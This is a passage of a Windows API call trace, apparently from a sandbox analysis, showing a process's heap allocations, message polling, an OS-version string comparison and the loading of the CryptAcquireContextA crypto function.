0x2e50ce0 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0217.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0217.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.262] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0217.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0217.262] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.263] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0217.263] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0217.263] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0217.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0217.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0217.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0217.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0217.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0217.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0217.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0217.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0217.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0217.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0217.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0217.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0217.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0217.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0217.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0217.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0217.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0217.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0217.267] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0217.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0217.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0217.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0217.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0217.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0217.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0217.268] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0217.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0217.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0217.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0217.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0217.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0217.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0217.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0217.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0217.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0217.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0217.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0217.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0217.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0217.269] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0217.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0217.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0217.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0217.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0217.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0217.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0217.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0217.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0217.271] HeapFree (in: hHeap=0x970000, 